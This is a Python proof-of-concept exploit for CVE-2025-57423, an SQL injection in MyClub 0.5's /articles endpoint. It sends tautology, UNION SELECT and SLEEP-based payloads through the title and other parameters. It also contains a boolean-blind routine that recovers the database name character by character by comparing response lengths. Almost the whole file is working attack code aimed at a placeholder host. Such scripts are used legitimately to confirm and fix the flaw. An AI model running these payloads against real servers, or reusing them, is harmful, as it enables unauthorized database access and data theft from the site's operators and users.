# CVE-2025-57423 - MyClub 0.5 SQL Injection PoC
# Vulnerability: SQL Injection in /articles endpoint
# Affected parameters: Content, GroupName, PersonName, lastUpdate, pool, title
import requests
# Placeholder host: no real server is configured here. Every request in this
# file goes to the single /articles handler named in the header comment.
TARGET_URL = "http://target-myclub-server"
ARTICLES_ENDPOINT = TARGET_URL + "/articles"
# PoC 1: Basic SQL Injection test on 'title' parameter
def test_sql_injection_title():
    """Send one GET to /articles with a quote-breaking value in ``title``.

    The probe travels in the URL query string (``params=``), so only the
    ``title`` parameter is set.  The status code and body length are printed;
    nothing is compared, so the output is for manual reading.

    Returns:
        The ``requests`` response object for the single request.
    """
    probe = "' OR '1'='1"
    reply = requests.get(ARTICLES_ENDPOINT, params={"title": probe})
    print(f"[+] Title injection response status: {reply.status_code}")
    print(f"[+] Response length: {len(reply.text)}")
    return reply
# PoC 2: UNION-based SQL Injection to extract database version
def union_based_injection():
    """Send a single ten-column UNION SELECT probe through ``title``.

    Prints the status code and, when the server answers HTTP 200, a
    "confirmed" line.  A 200 on its own does not separate an injected query
    from an ordinary search result, so that line is a weak signal only.

    Returns:
        The ``requests`` response object for the single request.
    """
    probe = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
    reply = requests.get(ARTICLES_ENDPOINT, params={"title": probe})
    print(f"[+] UNION injection response status: {reply.status_code}")
    # Status-only check: no column-count or echoed-marker inspection is done.
    if reply.status_code == 200:
        print("[+] Possible SQL injection confirmed!")
    return reply
# PoC 3: Boolean-based blind SQL Injection
def boolean_blind_injection():
    """Boolean-based blind SQL injection to extract data character by character.

    Reads the output of ``database()`` one position at a time through the
    ``title`` parameter, using response-body length as the true/false oracle.
    For each position two probes are sent (``>64`` and ``>96``); a length
    difference between their bodies is taken to mean the position holds a
    character, after which a binary search over 32..126 pins its code.
    Extraction stops at the first position where both probe bodies have the
    same length.  Each recovered character costs about nine near-identical
    requests (2 probes plus up to ~7 binary-search steps) that differ only in
    the ``title`` value.

    Returns:
        The characters recovered so far as a str; empty if the first pair of
        probes already matched in length.
    """
    result = ""
    for i in range(1, 50):
        # Extract database name character by character
        # assumes the ">64" probe is the true case for position i — TODO confirm
        payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>64-- -"
        params = {"title": payload}
        response_true = requests.get(ARTICLES_ENDPOINT, params=params)
        payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>96-- -"
        params = {"title": payload}
        response_false = requests.get(ARTICLES_ENDPOINT, params=params)
        if len(response_true.text) != len(response_false.text):
            # Binary search for the exact character
            low, high = 32, 126
            while low <= high:
                mid = (low + high) // 2
                payload = f"' AND ASCII(SUBSTRING(database(),{i},1))>{mid}-- -"
                params = {"title": payload}
                resp = requests.get(ARTICLES_ENDPOINT, params=params)
                # A body the same length as the ">64" reply is read as "greater than mid".
                if len(resp.text) == len(response_true.text):
                    low = mid + 1
                else:
                    high = mid - 1
            # When the loop exits, low is the smallest value the comparison did
            # not exceed, i.e. the character code — assuming the length oracle
            # answered consistently for every step.
            result += chr(low)
            print(f"[+] Extracted so far: {result}")
        else:
            break
    return result
# PoC 4: Time-based blind SQL Injection
def time_based_injection():
    """Issue one ``title`` request carrying a SLEEP(5) clause and time it.

    Wall-clock time around the GET is measured with ``time.time``; if the
    round trip takes 5 s or more a "confirmed" line is printed.  Network
    latency and server load count toward the same number, so a single
    measurement can read as a false positive.

    Returns:
        The ``requests`` response object for the single request.
    """
    import time

    probe = "' OR SLEEP(5)-- -"
    started = time.time()
    reply = requests.get(ARTICLES_ENDPOINT, params={"title": probe})
    elapsed = time.time() - started
    print(f"[+] Time-based injection elapsed: {elapsed:.2f}s")
    # Threshold equals the SLEEP argument; anything at or above it is reported.
    if elapsed >= 5:
        print("[+] Time-based SQL injection confirmed!")
    return reply
# PoC 5: Injection via multiple vulnerable parameters
def multi_param_injection():
    """Send the same quote-breaking value once through each listed parameter.

    One GET per parameter name from the header's affected list; each prints
    the status code and body length.  Nothing is returned and no comparison
    is made, so the printed lines are for manual reading.
    """
    probe = "' OR '1'='1' -- -"
    for name in ("Content", "GroupName", "PersonName", "lastUpdate", "pool", "title"):
        reply = requests.get(ARTICLES_ENDPOINT, params={name: probe})
        print(f"[+] Parameter '{name}' - Status: {reply.status_code}, Length: {len(reply.text)}")
if __name__ == "__main__":
    # Script entry point: prints a banner, then runs four of the PoC
    # functions in order.  boolean_blind_injection() is defined above but is
    # not invoked here.
    print("[*] Testing CVE-2025-57423 - MyClub 0.5 SQL Injection")
    print("[*] Target:", TARGET_URL)
    print("-" * 60)
    for poc in (
        test_sql_injection_title,
        union_based_injection,
        time_based_injection,
        multi_param_injection,
    ):
        poc()
    print("\n[*] PoC execution completed.")